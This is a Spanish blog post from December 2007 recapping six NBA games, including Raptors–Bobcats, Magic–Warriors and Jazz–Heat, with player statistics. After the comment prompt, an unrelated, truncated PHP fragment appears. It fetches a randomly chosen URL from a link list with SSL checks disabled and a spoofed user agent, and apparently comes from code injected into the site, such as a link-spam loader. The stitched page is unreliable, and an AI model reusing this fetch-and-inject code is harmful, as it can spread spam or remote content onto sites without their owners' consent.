La crónica(3/12/07)

04 de December de 2007 por Queco

La noche de ayer nos dejó el partidazo de 240 puntos en Oakland, la caida de libre de Miami incluso con Wade, la nueva derrota de Memphis, la buena onda de los Magic, la victoria de los Hawks y que los Raptors de la mano de Calderon ya no echan de menos a nadie.

 

Bobcats 79 – 98 Raptors

Los Raptors llegaban con las bajas de Chris Bosh, TJ Ford y Andrea Bargnani, tres titulares, es más, podría decirse que las tres estrellas del equipo. Pues al descanso estaba el partido finiquitado, 54-33, y si los Raptors notaron sus ausencias fue para bien. Calderón dio una nueva lección al alocado, aunque a veces efectivo, TJ Ford. Anotó 12 puntos, cogió 7 rebotes y repartió 9 asistencias. Hasta 6 jugadores de Toronto estuvieron por encima de 10 puntos, destacando Delfino y Humphries con 17 cada uno. Por los Bobcats, Felton, Richardson y Wallace se combinaron para un 7 de 28 en tiros de campo, destacando el 0 de 8 de Felton. Sólo cabe destacar de forma positiva al rookie Dudley con 16 puntos y 10 rebotes, saliendo de titular.

Hawks 88 – 79 Sixers

Los Hawks siguen a lo suyo, es decir, a ser irregulares. Un día ganan con relativa facilidad, usando su superioridad física general para defender agresivamente, y otro pierden por la inexperiencia general de la plantilla. Ayer tocó un día de los buenos. Josh Smith, Josh Childress y Marvin Williams tiraron del carro, con 22, 16 y 16 puntos, respectivamente, y estuvieron bien ayudados por Horford (12 puntos, 13 rebotes) y Joe Johnson (15 puntos y 7 asistencias). Por los Sixers, Willie Green anoto 23 puntos, y Andre Miller 18, con 4 rebotes y 6 asistencias. Sin embargo, pinchó su líder, André Iguodala, que se quedó en 11 puntos, con sólo 4 de 14 en tiros. Destacamos también que Pachulia jugó sólo 28 segundos, pues tuvo una fea caída y hubo de abandonar el partido con un fuerte golpe en la cabeza.

Blazers 106 – 105 Grizzlies

Primera victoria de los Blazers lejos de Portland, y ha sido sobre la bocina, con canastón de Travis Outlaw (21 puntos y 7 rebotes saliendo de banquillo) incluido. Outlaw se convirtió en la estrella de su equipo, al anotar 7 puntos en el ultimo minuto, todos los de su equipo, por cierto. Memphis ganaba por 7 al descanso, tras un gran segundo cuarto, pero se dejaron remontar. Incluso llegó a ir 103-99, y ahí fue cuando apareció Outlaw. Destacados Brandon Roy, que tras unos partidos bastante malos, firmó 26 puntos, 9 rebotes y 7 asistencias, y Lamarcus Aldridge con 23 puntos por los de Portland. En Memphis Rudy Gay sigue tirando todo lo que pasa por sus manos, esta noche con mucho acierto, 30 puntos y 8 rebotes, en una serie de 12-16 en el tiro. Mike Miller aportó otros 30 puntos y 7 rebotes. Los españoles, Gasol 14 puntos y 15 rebotes, sólo 4 de 14 en tiros, evidencia día tras día que el estilo de juego no es el mejor para él. Navarro salió desde el banquillo, para anotar 16 puntos coger un rebote y dar dos asistencias. Sergio Rodríguez jugó apenas 3 minutos y dio una asistencia.

Mavericks 103 – 98 Bulls

Los Bulls venían de ganar dos partidos consecutivos tras su desastroso inicio de temporada (2-10), y buscaban su tercera victoria consecutiva. Sin embargo, pronto se vio que ni Josh Howard (27 puntos, 10 rebotes, 6 asistencias), ni Dirk Nowitzki (25 puntos, 6 rebotes) tenían intención de permitírselo. Así, se llegó al descanso con ventaja de 12 para los texanos. Tras un tercer cuarto horrible por parte de ambos equipos (parcial de 16-15 para los Bulls), donde lo único destacable fue el golpe (y el susto general) que se llevó Devin Harris, en el último cuarto los Bulls hicieron gala de su nombre para ir a por el partido. Llegaron a ponerse a 3 a falta de 12 segundos, pero de ahí no pasaron. Nocioni, que anotó 30 puntos, 15 de ellos desde el tiro libre, fue el jugador más entonado de los Bulls. De los demás, sólo Hinrich con 18 puntos es destacable, pero tuvo una mala noche en el tiro, incluyendo un malísimo triple al final, que terminó de hundir las esperanzas de Chicago.

Magic 123 – 117 Warriors

Dos equipos ofensivos y en racha se encontraron en el Oracle Arena de Oakland. De ahí sólo podía salir un partido espectacular y así fue: 240 puntos anotaron Warriors y Magic en un partido que cayo del lado de éstos últimos en la prórroga tras un final en el que ambos equipos tuvieron sus opciones. A los locales les acabó pesando su mal día en el lanzamiento, aspecto en el que presentaron cifras de vértigo: 111 lanzamientos realizados, sólo 42 anotados, con 9 de 40 en triples. La extrema igualdad en el rebote, 54 para cada equipo, hizo que no hubiese grandes diferencias y fue el mayor acierto visitante en el tiempo extra el que decidió. Por Orlando brilló especialmente Nelson, con 22 puntos, 11 asistencias y 8 rebotes. 22 hizo también Bogans, por 20 de Rashard Lewis, 18 con 23 rebotes y 7 tapones de Dwight Howard y 17-8-6 de Turkoglu. En los Warriors, Monta Ellis logró 22 puntos, 12 rebotes y 7 asistencias, Jackson anotó 25 puntos (todos después del descanso), Baron Davis se quedó en 19-9 y no pudo jugar la prórroga al ser eliminado por faltas y tanto Harrington como Biedrins firmaron dobles-dobles. Es la segunda derrota en 11 partidos de los Warriors después de arrancar la temporada con 6 derrotas, mientras que los Magic se consolidan como el mejor visitante de la liga y ya suman 16-4.

Heat 101 – 110 Jazz

Los Jazz venían de ganar a los Lakers sin Okur ni Boozer, pero hoy venían los Heat, con Shaq a la cabeza, y dejar fuera a sus dos interiores titulares podía ser un suicidio. Claro que Shaq ya no aplica el artículo 34, ni el 32, ni ningún artículo. Ayer dejó totalmente libre a Okur, y éste, clavó 4 de 5 en triples, 10 de 14 en tiros, para un total de 25 puntos. Pero para seguir hurgando en la herida, Boozer anotó 24 puntos y cogió 15 rebotes, dio 5 asistencias e hizo 4 robos de balón, y no se puede decir que sea un fino estilista como el turco. Aparte, Deron Williams anotó otros 24 puntos, y repartió 15 asistencias, y el ruso Kirilenko 10 puntos, 7 rebotes y 9 asistencias. Por Miami destacó el de siempre, Wade, 26 puntos 10 asistencias y 5 robos, ayudado por Jason Williams y Ricky Davis, ambos con 15 puntos. Miami sigue en barrena, su record es ya 4-13, y han perdido 4 de los últimos 5. Parece que ni la vuelta de Flash los va a salvar.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>